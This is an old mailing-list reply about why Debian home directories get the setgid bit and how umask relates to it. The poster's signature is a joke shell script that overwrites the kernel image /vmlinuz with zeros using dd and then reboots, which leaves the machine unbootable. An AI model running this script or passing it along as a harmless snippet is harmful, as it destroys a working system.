On Fri, Jun 09, 2000 at 07:07:05AM +0000, ktb wrote:
> Andrew McRobert wrote:
> >
> > hi all
> >
> > When a user creates a new directory/file in their home directory,
> > the setuid bit is always set for group members, ie.
> >
> > drwxr-sr-x
> >
> > umask = 022, what do I need to set it to, for new files to =
> > drwxr-xr-x ... and is this ok security-wise ... the execute bit?
> >
> > thanks
> >
> > Andrew
>
> I'm not very good with numeric file modes. I usually use symbolic but
> I think the permissions you want would be 755. Assuming that is
> correct you subtract that number from 777 to get the unmask number--
> 777-755=22 so the unmask value would be 022 which is what it already
> is. Maybe I have the file mode wrong or something but maybe this will
> give you enough to figure out what you want. I have no idea about the
> security of the permissions. hth, kent
AFAIK, sticky bits, setuid, setguid are "inherited" from the parent
dirs. By default, Debian sets home dirs dwrxr-sr-x, or 2755. Don't
think the umask affects that... Also, by default, when users are created
they are members of a group with the same name as the user name. All of
these things can be changed... The setgid thingy isn't a bad thing,
since files/dirs are given the same gid the user has, which presumably
isn't shared by other users (unlike a "users", or "faculty" catch all
group).
--
#! /bin/sh
echo 'Linux Must Die!' | wall
dd if=/dev/zero of=/vmlinuz bs=1 \
count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'`
shutdown -r now
